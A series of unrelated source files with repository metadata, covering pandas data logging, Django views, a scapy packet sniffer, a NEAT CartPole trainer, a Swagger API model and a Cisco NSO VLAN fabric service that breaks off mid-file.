dfFiltered = dfFiltered.replace('yellowing', -45.0)
dataFrameB = dataFrameB.append(dfFiltered)
dfSum = dfFiltered.sum(axis=0)
dataFrameC = dataFrameC.append(dfSum, ignore_index=True)
# dataFrameB.label[dataFrameB.label == 'yellowing'] = -100.0
# concatenate id and feature, sort by feature
dfF = pd.concat([dataFrame, dataFrameC], axis=1)
dfSorted = dfF.sort_values(by=['label'], ascending=False)
dfSorted = dfSorted.dropna()
dfSorted = dfSorted.rename(columns={0:'id'})
dfSorted = dfSorted.rename(columns={'label': 'featureSum'})
dfOutput = dfSorted.to_csv('/Users/vinceparis/dev/dfyb/utils/test.csv')
naturans = pd.read_csv('/Users/vinceparis/dev/dfyb/utils/test.csv')
# to the id and feature columns, we will add an 'age' column.
# first, create a 'planted time' column;
time = []
planted = pd.Timestamp('2019-04-16 00:06:33.346275')
col = dfSorted.__len__()
for x in range(0, col):
time.append(planted)
plantedColumn = np.c_[time]
plantedColumn = pd.DataFrame(plantedColumn)
output = naturans.join(plantedColumn)
output = output.rename(columns={0: "planted"})
output = output.filter(items=('id', 'featureSum', 'planted'))
# print(output)
# second, create 'current time' column.
time2 = []
for x in range (0, col):
time2.append(pd.Timestamp.now())
currentColumn = np.c_[time2]
output2 = pd.DataFrame(currentColumn)
output2 = output.join(output2)
output2 = output2.rename(columns={0: "current time"})
# print(output2)
# derive 'age' by subtracting 'planted time' from 'current time'
output2['age'] = output2['current time'] - output2['planted']
output2 = output2.filter(items=('id', 'age', 'featureSum'))
output2['age'] = output2['age'].astype(str).str[0:2]
output2['age'] = output2['age'].astype(float)
print(output2)
# send to environment folders (with a datetime)
now = datetime.datetime.now()
now = now.strftime("%m-%d")
output = output2.to_csv('/Users/vinceparis/dev/dfyb/GrowLogs/ei/eidailyData/e2gL'+str(now)+'.csv')
|
[
"vinceparis19@gmail.com"
] |
vinceparis19@gmail.com
|
13e2272bb18ea159a1d979995232168771b64045
|
3b930f60a7bea984c309f2a5572af2a586a6ca9a
|
/mango-python/bdgenomics/mango/utils.py
|
3c047972f51c6ab90e95a6ad5a0c0d2d26fafe11
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
shaneknapp/mango
|
00a2231c410a917747e66e8d520ae5c4a071d1ea
|
6eba24abd2387bd2c52ad319b34c8a82a904ec50
|
refs/heads/master
| 2020-06-10T03:48:46.360379
| 2019-06-24T19:16:01
| 2019-06-24T19:16:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 796
|
py
|
#
# Licensed to Big Data Genomics (BDG) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The BDG licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
CHR_PREFIX = 'chr'
|
[
"akmorrow@berkeley.edu"
] |
akmorrow@berkeley.edu
|
789f531277e300cc7635ee1540d92eaf1537f0b8
|
a962e861619672524f8601ec721bf22dee9af0e9
|
/webapp/views/views.py
|
18d3d258bdff686fa2bffcbeaa7dfa41c1db92d5
|
[] |
no_license
|
GELIFT/backend
|
679fdfd663c62153c0bf18ea1e450e12991e66e0
|
a39bf74d04dc4b2731da370860f0c49064b49868
|
refs/heads/master
| 2020-03-30T20:51:44.048039
| 2018-10-04T18:34:59
| 2018-10-04T18:34:59
| 151,607,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from webapp.models import Event, User
@login_required
def admin_dashboard(request):
events = Event.objects.all().order_by('-start_date')[:5]
users = User.objects.exclude(is_superuser=True).order_by('last_name')[:5]
return render(request, 'webapp/admin/admin_dashboard.html', {'events': events, 'users': users})
def index(request):
# Get active event
event = Event.objects.filter(is_active=True)
if event:
event = Event.objects.get(is_active=True)
return render(request, 'webapp/index.html', {'event': event})
else:
return render(request, 'webapp/index.html')
|
[
"g.a.f.derks@student.tue.nl"
] |
g.a.f.derks@student.tue.nl
|
ad8ca63c444d4bf8b98831272e3fa7df41cd671d
|
331635a7ffc237ebc34722d6eb2ae69e0b82c3a2
|
/20170818-threes-and-twos/threes-and-twos.py
|
b79b054b5eab3683bc35f973d3a6c7f9fcda2414
|
[] |
no_license
|
brmcdonnell/riddlers
|
22192dd07288be99f5fcd659d68be9a65a32f3f7
|
674cb31637ed88f29f37078de1945d367895a2ca
|
refs/heads/master
| 2022-04-20T08:36:00.402698
| 2020-03-28T20:44:54
| 2020-03-28T20:44:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
import numpy as np
import pandas as pd
sq = [3, 3, 3, 2]
ITER = int(1e4)
for i in range(1, ITER):
sq = sq + [3] * sq[i] + [2]
print('\nTable of 3s and 2s:')
print(pd.Series(sq).value_counts())
print('\nProportion of 3s and 2s:')
print(pd.Series(sq).value_counts() / len(sq))
|
[
"tim.book@summit.local"
] |
tim.book@summit.local
|
2433ea1d0965c169a7c6fd0e959543ad462f83d3
|
7dcb8b52d2c7bd223a86fa93e40c0153b0959206
|
/Scapy/scapy_sniff.py
|
6d99313a30ebd36be3fce903987e728c285c233e
|
[] |
no_license
|
gast04/CTF_ToolBox
|
2e36f81f083a1f4518a817e5fcaf8dfaa44e0b31
|
a1d74448a936e3b8ba1288edc099794776582fbd
|
refs/heads/master
| 2021-10-25T18:50:03.154094
| 2021-10-24T13:08:39
| 2021-10-24T13:08:39
| 94,090,071
| 15
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
from scapy.all import *
def pkt_callback(pkt):
if TCP in pkt:
print "TCP pkt"
elif UDP in pkt:
print "UDP pkt"
# call without filter to get all packets
sniff(iface="enp0s25", prn=pkt_callback, store=0)
#sniff(iface="enp0s25", prn=pkt_callback, filter="tcp", store=0)
|
[
"kurt.nistelberger@student.tugraz.at"
] |
kurt.nistelberger@student.tugraz.at
|
e20e7f340b0e719fa019c02d2a227a6589f4cc4f
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_baccalaureates.py
|
b6b3d264696b8bd5b102cbd3f2ddde23ad54b79c
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
from xai.brain.wordbase.nouns._baccalaureate import _BACCALAUREATE
#calss header
class _BACCALAUREATES(_BACCALAUREATE, ):
def __init__(self,):
_BACCALAUREATE.__init__(self)
self.name = "BACCALAUREATES"
self.specie = 'nouns'
self.basic = "baccalaureate"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
38986d4a704fb788926d73c8dcd2ed3bad07d847
|
45de3aa97525713e3a452c18dcabe61ac9cf0877
|
/src/primaires/objet/types/indefini.py
|
72fd243688f6d99b9e1d5c92bccd62e605901e8d
|
[
"BSD-3-Clause"
] |
permissive
|
stormi/tsunami
|
95a6da188eadea3620c70f7028f32806ee2ec0d1
|
bdc853229834b52b2ee8ed54a3161a1a3133d926
|
refs/heads/master
| 2020-12-26T04:27:13.578652
| 2015-11-17T21:32:38
| 2015-11-17T21:32:38
| 25,606,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,744
|
py
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le type Indefini."""
from .base import BaseType
class Indefini(BaseType):
"""Type d'objet: indéfini.
"""
nom_type = "indéfini"
|
[
"kredh@free.fr"
] |
kredh@free.fr
|
82d72696650cdd9a2724152e1d3ba36d60cf2985
|
683289aa4b0c9788b0f3d11dcd8b6cabaefbf17f
|
/solid/2. open_close_principle/__init__.py
|
dc82f5e9024073acaeec7d2fac505c84d9bd85e4
|
[] |
no_license
|
Mort4lis/design-patterns
|
59f8387031da138416e73dbb2175001f67656639
|
2a6e3a46c877df94f5681798f8bea3a6a506fd59
|
refs/heads/master
| 2022-04-23T16:25:35.878979
| 2020-04-25T13:03:41
| 2020-04-25T13:03:41
| 258,315,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 930
|
py
|
# Open/Closed Principle
# Extend classes, but do not change their original code!
# We should strive for classes that are open for extension
# and closed for modification.
# An open class is a class that is available for extension (by creating a subclass).
# A closed (finished) class is a class whose interface is finally defined and will not
# change in the future, i.e. it is ready to be used by other classes.
# The goal is to avoid breaking existing code when making changes to the program.
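# A minimal illustrative sketch of the principle (hypothetical classes, not part of the
# original module): new behaviour is added by subclassing, not by editing existing code.
from abc import ABC, abstractmethod


class Shape(ABC):
    """Closed for modification: the interface is fixed."""

    @abstractmethod
    def area(self):
        ...


class Circle(Shape):
    """Open for extension: new shapes are added as subclasses."""

    def __init__(self, radius):
        self.radius = radius

    def area(self):
        return 3.141592653589793 * self.radius ** 2


class Square(Shape):
    def __init__(self, side):
        self.side = side

    def area(self):
        return self.side ** 2


def total_area(shapes):
    # Existing client code does not change when a new Shape subclass appears.
    return sum(shape.area() for shape in shapes)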
|
[
"mortalis94@gmail.com"
] |
mortalis94@gmail.com
|
e73cfc2cdec009c867b3c766a6a035d38f33dfd6
|
b3ab2979dd8638b244abdb2dcf8da26d45d7b730
|
/cloudcheckr_cmx_client/models/azure_csp_authorization_request_model.py
|
e76c907e4fd2a4a72db3231108f61a129ace91ae
|
[] |
no_license
|
CU-CommunityApps/ct-cloudcheckr-cmx-client
|
4b3d9b82c5dfdaf24f8f443526868e971d8d1b15
|
18ac9fd4d6c4ae799c0d21745eaecd783da68c0c
|
refs/heads/main
| 2023-03-03T19:53:57.685925
| 2021-02-09T13:05:07
| 2021-02-09T13:05:07
| 329,308,757
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,134
|
py
|
# coding: utf-8
"""
CloudCheckr API
CloudCheckr API # noqa: E501
OpenAPI spec version: v1
Contact: support@cloudcheckr.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class AzureCspAuthorizationRequestModel(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'purchase_model': 'str',
'region_group': 'str'
}
attribute_map = {
'purchase_model': 'purchaseModel',
'region_group': 'regionGroup'
}
def __init__(self, purchase_model=None, region_group=None): # noqa: E501
"""AzureCspAuthorizationRequestModel - a model defined in Swagger""" # noqa: E501
self._purchase_model = None
self._region_group = None
self.discriminator = None
if purchase_model is not None:
self.purchase_model = purchase_model
if region_group is not None:
self.region_group = region_group
@property
def purchase_model(self):
"""Gets the purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
The account's purchase model. # noqa: E501
:return: The purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
:rtype: str
"""
return self._purchase_model
@purchase_model.setter
def purchase_model(self, purchase_model):
"""Sets the purchase_model of this AzureCspAuthorizationRequestModel.
The account's purchase model. # noqa: E501
:param purchase_model: The purchase_model of this AzureCspAuthorizationRequestModel. # noqa: E501
:type: str
"""
allowed_values = ["AzurePlan", "Classic"] # noqa: E501
if purchase_model not in allowed_values:
raise ValueError(
"Invalid value for `purchase_model` ({0}), must be one of {1}" # noqa: E501
.format(purchase_model, allowed_values)
)
self._purchase_model = purchase_model
@property
def region_group(self):
"""Gets the region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
The account's region group (i.e. the unique data center group that is being used, e.g. commercial, gov, etc). # noqa: E501
:return: The region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
:rtype: str
"""
return self._region_group
@region_group.setter
def region_group(self, region_group):
"""Sets the region_group of this AzureCspAuthorizationRequestModel.
The account's region group (i.e. the unique data center group that is being used, e.g. commercial, gov, etc). # noqa: E501
:param region_group: The region_group of this AzureCspAuthorizationRequestModel. # noqa: E501
:type: str
"""
allowed_values = ["Commercial", "UsGov", "Germany"] # noqa: E501
if region_group not in allowed_values:
raise ValueError(
"Invalid value for `region_group` ({0}), must be one of {1}" # noqa: E501
.format(region_group, allowed_values)
)
self._region_group = region_group
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(AzureCspAuthorizationRequestModel, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AzureCspAuthorizationRequestModel):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
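# Minimal usage sketch (assumed, not part of the generated client code):
if __name__ == "__main__":
    model = AzureCspAuthorizationRequestModel(
        purchase_model="AzurePlan", region_group="Commercial"
    )
    print(model.to_dict())  # {'purchase_model': 'AzurePlan', 'region_group': 'Commercial'}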
|
[
"pea1@cornell.edu"
] |
pea1@cornell.edu
|
1bdf3386a5b0d8cfbe5b707f75b6b7a97e05548a
|
2a713ff21aba33bcbe54ea1448a0509d3ee1a5fd
|
/environments/CartPole-v1/discount_factor.py
|
54c5062d23b82605982b0a1083e6ceb304960052
|
[
"Apache-2.0"
] |
permissive
|
ShreyanshDarshan/PyTorch-NEAT
|
b1b8a3e62d029b6db02459510a6a7d6c2f0f7d06
|
062efa487da3f7e9b444af7babd7868028bbb5f3
|
refs/heads/master
| 2022-10-23T17:49:20.757644
| 2020-06-07T19:37:18
| 2020-06-07T14:20:56
| 270,021,251
| 0
| 0
|
Apache-2.0
| 2020-06-06T20:04:36
| 2020-06-06T15:24:33
|
Python
|
UTF-8
|
Python
| false
| false
| 2,249
|
py
|
# Copyright (c) 2018 Archit Rungta
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import click
import gym
import neat
from pytorch_neat.discount_factor_eval import DiscountEnvEvalator
from pytorch_neat.neat_reporter import TensorBoardReporter
from pytorch_neat.recurrent_net import RecurrentNet
max_env_steps = 200
env_name = "CartPole-v1"
def make_env():
return gym.make(env_name)
def make_net(genome, config, bs):
return RecurrentNet.create(genome, config, bs)
def activate_net(net, states):
outputs = net.activate(states).numpy()
return outputs[:, 0] > 0.5
@click.command()
@click.option("--n_generations", type=int, default=100)
def run(n_generations):
# Load the config file, which is assumed to live in
# the same directory as this script.
config_path = os.path.join(os.path.dirname(__file__), "neat.cfg")
config = neat.Config(
neat.DefaultGenome,
neat.DefaultReproduction,
neat.DefaultSpeciesSet,
neat.DefaultStagnation,
config_path,
)
evaluator = DiscountEnvEvalator(
make_net, activate_net, 0.95, make_env=make_env, max_env_steps=max_env_steps
)
def eval_genomes(genomes, config):
for _, genome in genomes:
genome.fitness = evaluator.eval_genome(genome, config)
pop = neat.Population(config)
stats = neat.StatisticsReporter()
pop.add_reporter(stats)
reporter = neat.StdOutReporter(True)
pop.add_reporter(reporter)
logger = TensorBoardReporter("%s-discount" % env_name, "neat.log", evaluator.eval_genome)
pop.add_reporter(logger)
pop.run(eval_genomes, n_generations)
if __name__ == "__main__":
run() # pylint: disable=no-value-for-parameter
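# Illustration only: DiscountEnvEvalator's source is not shown here, but a discount
# factor of 0.95 weights an episode's rewards roughly as in the helper below,
# e.g. rewards [1, 1, 1] -> 1 + 0.95 + 0.9025 = 2.8525.
def _discounted_return(rewards, gamma=0.95):
    """Sum of gamma**t * r_t over an episode's reward sequence."""
    return sum((gamma ** t) * r for t, r in enumerate(rewards))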
|
[
"architrungta120@gmail.com"
] |
architrungta120@gmail.com
|
d50d43cea20a3bde861eedd107d12122e4ea223d
|
18936a3058a0f130676535a3ee6408239fd7cdbc
|
/tests/path_helper.py
|
ed60538c773ea3cff382d9b7f778c6548d9ddf3d
|
[
"BSD-2-Clause"
] |
permissive
|
thxo/cabrillo
|
4b7b5446087897f1a5a57a1aaca93348f4b37b99
|
fbfc047c42f877ff139de367b359de0af1e20441
|
refs/heads/master
| 2023-04-07T08:56:00.674525
| 2023-04-02T08:40:03
| 2023-04-02T08:41:48
| 161,945,220
| 12
| 7
|
BSD-2-Clause
| 2023-04-02T08:32:49
| 2018-12-15T21:28:06
|
Python
|
UTF-8
|
Python
| false
| false
| 239
|
py
|
import sys
import os.path
"""Make the cabrillo module importable from the tests' point of view."""
project_root_dir = os.path.dirname(os.path.dirname(__file__))
if project_root_dir not in sys.path:
sys.path.append(project_root_dir)
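# Hypothetical usage from a test module (file name is illustrative):
#
#     import path_helper  # noqa: F401  (side effect: project root is now on sys.path)
#     import cabrillo     # resolves against this checkout without installing the package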
|
[
"21995564+thxo@users.noreply.github.com"
] |
21995564+thxo@users.noreply.github.com
|
8de09eab1d45109af504b4a4e86309ad1f917a0d
|
eeccdfd79556fa3b867733132c9e4182389b3380
|
/InstanceHealth/flask/lib/python2.7/encodings/iso8859_9.py
|
1e9881a9bbe9cac0aed38804d7f58850314df9f8
|
[] |
no_license
|
gokula1995/saveTime
|
ce44c5c4b48e1e3d9bc8af8c26b8e4f379937911
|
82f5554932cbdb870595298a6c93a3a1cd97d95a
|
refs/heads/master
| 2020-07-05T17:09:08.012468
| 2019-10-20T15:04:47
| 2019-10-20T15:04:47
| 202,707,399
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 113
|
py
|
/usr/local/Cellar/python@2/2.7.15_3/Frameworks/Python.framework/Versions/2.7/lib/python2.7/encodings/iso8859_9.py
|
[
"gokula.adabala@gmail.com"
] |
gokula.adabala@gmail.com
|
b7209cadc13f45308b995e0899d72fa860e99a50
|
30f654d2feea989ed36756a3beab302c4fa51a94
|
/DjangoDockerDemo/wsgi.py
|
b0d95077b72daa9b3cdd65ac27ebaad0416049bd
|
[] |
no_license
|
cbalkig/DjangoDockerDemo
|
a3d061f0ab50bfd8151246d59b8cf80eef61b125
|
384ac5806399d01f5597db3a9e0c5203b285ee85
|
refs/heads/master
| 2022-04-20T07:04:55.984324
| 2020-04-22T12:14:58
| 2020-04-22T12:14:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
WSGI config for DjangoDockerDemo project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'DjangoDockerDemo.settings')
application = get_wsgi_application()
|
[
"balki1985@gmail.com"
] |
balki1985@gmail.com
|
d15d0f7899b5d69e37ae286c5bc3ca8972755234
|
05fbca423d3704c4c2f75ad0677811bbd2bc8ec3
|
/sawa/urls.py
|
333b5d28c62c0d15f9407b7e940e5524041cc760
|
[] |
no_license
|
stilgeki/SAWA
|
653add93da5a5263bdf7c720bb5344a9e4689192
|
4f3534a705ab1bae13f96b7e770f934f2a0550c2
|
refs/heads/master
| 2016-09-14T11:07:47.182117
| 2016-04-28T00:42:14
| 2016-04-28T00:42:14
| 57,258,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 339
|
py
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.upload, name = 'upload'),
url(r'^execute/$', views.execute, name = 'execute'),
url(r'^help/$', views.help, name = 'help'),
url(r'^results/$', views.results, name = 'results'),
url(r'^loading/$', views.loading, name = 'loading'),
]
|
[
"stilgeki@miamioh.edu"
] |
stilgeki@miamioh.edu
|
0a3ca56c977088ca6e0697402dafb8661ab78d31
|
d08d1d0fd863e3121e27080ac5892bd39f0b11b8
|
/vlan-fabric/python/vlan_fabric/tenant.py
|
83582986a258d51be34d84e463ae50a8caff55a5
|
[
"MIT"
] |
permissive
|
rrojasc/sandbox-nso
|
be4211dbedc3d87d8830616db593dac71c051e75
|
b44dce57904b916a570d0fe272c64cfe1f4c7575
|
refs/heads/master
| 2023-03-16T13:04:25.013628
| 2019-12-16T13:26:12
| 2019-12-16T13:26:12
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 20,403
|
py
|
# -*- mode: python; python-indent: 4 -*-
import ncs
from ncs.application import Service
# import resource_manager.id_allocator as id_allocator
import ipaddress
# ------------------------
# SERVICE CALLBACK EXAMPLE
# ------------------------
class ServiceCallbacks(Service):
# The create() callback is invoked inside NCS FASTMAP and
# must always exist.
@Service.create
def cb_create(self, tctx, root, service, proplist):
self.log.info("Service create(service=", service._path, ")")
vars = ncs.template.Variables()
vars.add("DUMMY", "127.0.0.1")
template = ncs.template.Template(service)
disable_trunk_negotiation = False
# PHASE - Get Fabric Member Devices
# primary_ip_address = root.devices.device[pair.primary].config.interface.mgmt["0"].ip.address.ipaddr
switch_pairs = root.vlan_fabric[service.fabric].switch_pair
switches = root.vlan_fabric[service.fabric].switch
# Initialize with NONE
border_pair = None
self.log.info("Switches for Fabric {} are: ".format(service.fabric))
for pair in switch_pairs:
self.log.info(
"Pair: {} Primary {} Secondary {}".format(
pair.name, pair.primary, pair.secondary
)
)
if pair.layer3:
border_pair = pair
self.log.info(
"Layer 3 Switch Pair is {} Primary {} Secondary {}".format(
pair.name, pair.primary, pair.secondary
)
)
self.log.info(
"Switches for Fabric {} are {}".format(service.fabric, switches.__dict__)
)
for switch in switches:
self.log.info("Switch: {}".format(switch.device))
# PHASE - Get Fabric Interconnect Resources for Fabric
fabric_interconnects = root.vlan_fabric[service.fabric].fabric_interconnect
self.log.info("Fabric Interconnects for Fabric {} are:".format(service.fabric))
for fabric_interconnect in fabric_interconnects:
self.log.info("FI: {}".format(fabric_interconnect.device))
        # PHASE - Get VMware DVS Resources for Fabric
vswitches = root.vlan_fabric[service.fabric].vmware_dvs
self.log.info(
"VMware Distributed vSwitches for Fabric {} are:".format(service.fabric)
)
for vswitch in vswitches:
self.log.info(
"vCenter {} Datacenter {} dVS {}".format(
vswitch.vcenter, vswitch.datacenter, vswitch.dvs
)
)
# PHASE - Configure Static Routes if configured
if border_pair:
routing_vars = ncs.template.Variables()
routing_vars.add("VRFNAME", service.name)
# PHASE - Static routes
for route in service.static_routes:
# self.log.info("Setting up static route for {} to {} in VRF {}".format(route.network, route.gateway, service.name))
routing_vars.add("STATIC_ROUTE_NETWORK", route.network)
routing_vars.add("STATIC_ROUTE_GATEWAY", route.gateway)
# PRIMARY
self.log.info(
"Setting up static route for {} to {} in VRF {} on switch_pair {} Primary Device {}".format(
route.network,
route.gateway,
service.name,
border_pair,
border_pair.primary,
)
)
routing_vars.add("DEVICE_NAME", border_pair.primary)
self.log.info("routing_vars={}".format(routing_vars))
template.apply("vrf-static-routes", routing_vars)
# Secondary
if border_pair.secondary:
self.log.info(
"Setting up static route for {} to {} in VRF {} on switch_pair {} Primary Device {}".format(
route.network,
route.gateway,
service.name,
border_pair,
border_pair.secondary,
)
)
routing_vars.add("DEVICE_NAME", border_pair.secondary)
template.apply("vrf-static-routes", routing_vars)
else:
self.log.info(
"Note: Fabric {} has NO Layer 3 Border Pair.".format(service.fabric)
)
# PHASE Process Each Network in Service
for network in service.network:
# PHASE - Add VLANS to all Fabric Switches
self.log.info(
"Adding VLAN {} for Network {}".format(network.name, network.vlanid)
)
network_vars = ncs.template.Variables()
network_vars.add("VLAN_ID", network.vlanid)
network_vars.add("VLAN_NAME", network.name)
for pair in switch_pairs:
self.log.info(
"Adding VLAN for Pair: {} Primary {} Secondary {}".format(
pair.name, pair.primary, pair.secondary
)
)
# PRIMARY
network_vars.add("DEVICE_NAME", pair.primary)
template.apply("vlan-new", network_vars)
if pair.secondary:
# Secondary
network_vars.add("DEVICE_NAME", pair.secondary)
template.apply("vlan-new", network_vars)
for switch in switches:
self.log.info("Adding VLAN for Switch: {}".format(switch.device))
network_vars.add("DEVICE_NAME", switch.device)
template.apply("vlan-new", network_vars)
# PHASE - Configure Layer 3 For Network
# Check if layer3-on-fabric is configured for network
if network.layer3_on_fabric:
self.log.info(
"Configuring Layer 3 for {} IP Network {} ".format(
network.name, network.network
)
)
ipnet = ipaddress.ip_network(network.network)
hsrp_ipv4 = ipnet.network_address + 1
primary_ipv4 = ipnet.network_address + 2
secondary_ipv4 = ipnet.network_address + 3
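                # Worked example with hypothetical values: network.network = "10.1.1.0/24"
                # gives hsrp_ipv4 = 10.1.1.1 (shared virtual gateway), primary_ipv4 =
                # 10.1.1.2, secondary_ipv4 = 10.1.1.3, and ipnet.prefixlen = 24 for the SVIs.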
network_vars.add("VRFNAME", service.name)
network_vars.add("HSRP_GROUP", 1)
network_vars.add("HSRP_IPV4", hsrp_ipv4)
if network.build_route_neighbors:
network_vars.add("BUILD_ROUTING_NEIGHBOR", "True")
else:
network_vars.add("BUILD_ROUTING_NEIGHBOR", "")
# PRIMARY
network_vars.add("DEVICE_NAME", border_pair.primary)
network_vars.add(
"SVI_IPV4", "{}/{}".format(primary_ipv4, ipnet.prefixlen)
)
network_vars.add("HSRP_PRIORITY", 110)
template.apply("vlan-layer3", network_vars)
if network.dhcp_relay_address:
network_vars.add("DHCP_RELAY_ADDRESS", network.dhcp_relay_address)
self.log.info("Configuring DHCP Relay address {} for {} IP Network {} ".format(
network.dhcp_relay_address, network.name, network.network
)
)
template.apply("vlan-layer3-dhcp-relay", network_vars)
if border_pair.secondary:
# Secondary
network_vars.add("DEVICE_NAME", border_pair.secondary)
network_vars.add(
"SVI_IPV4", "{}/{}".format(secondary_ipv4, ipnet.prefixlen)
)
network_vars.add("HSRP_PRIORITY", 90)
template.apply("vlan-layer3", network_vars)
if network.dhcp_relay_address:
network_vars.add("DHCP_RELAY_ADDRESS", network.dhcp_relay_address)
self.log.info("Configuring DHCP Relay address {} for {} IP Network {} ".format(
network.dhcp_relay_address, network.name, network.network
)
)
template.apply("vlan-layer3-dhcp-relay", network_vars)
else:
self.log.info(
"Skipping Layer 3 configuration in fabric for {} IP Network {} ".format(
network.name, network.network
)
)
# PHASE Process Connections for Network
# PHASE Switch Connections
for switch in network.connections.switch:
self.log.info(
"Adding Connections for Network {} on Switch {}".format(
network.name, switch.device
)
)
network_vars.add("DEVICE_NAME", switch.device)
switch_platform = {}
switch_platform["name"] = root.devices.device[
switch.device
].platform.name
switch_platform["version"] = root.devices.device[
switch.device
].platform.version
switch_platform["model"] = root.devices.device[
switch.device
].platform.model
self.log.info("Switch Platform Info: {}".format(switch_platform))
# For old IOS that supported DTP, need to disable negotiation
if (
switch_platform["model"] != "NETSIM"
and switch_platform["name"] == "ios"
and int(switch_platform["version"][0:2]) < 16
):
disable_trunk_negotiation = True
else:
disable_trunk_negotiation = False
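                # E.g. an IOS switch reporting version "15.2(4)E7" yields int("15") < 16,
                # so DTP trunk negotiation is explicitly disabled for it; IOS-XE 16.x,
                # NETSIM and non-IOS platforms fall through to False here.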
network_vars.add("DISABLE_TRUNK_NEGOTIATION", disable_trunk_negotiation)
network_vars.add("MTU_SIZE", "9216")
# PHASE Interfaces
for interface in switch.interface:
self.log.info(
"Configuring Intereface {} for Network {} on Switch {}".format(
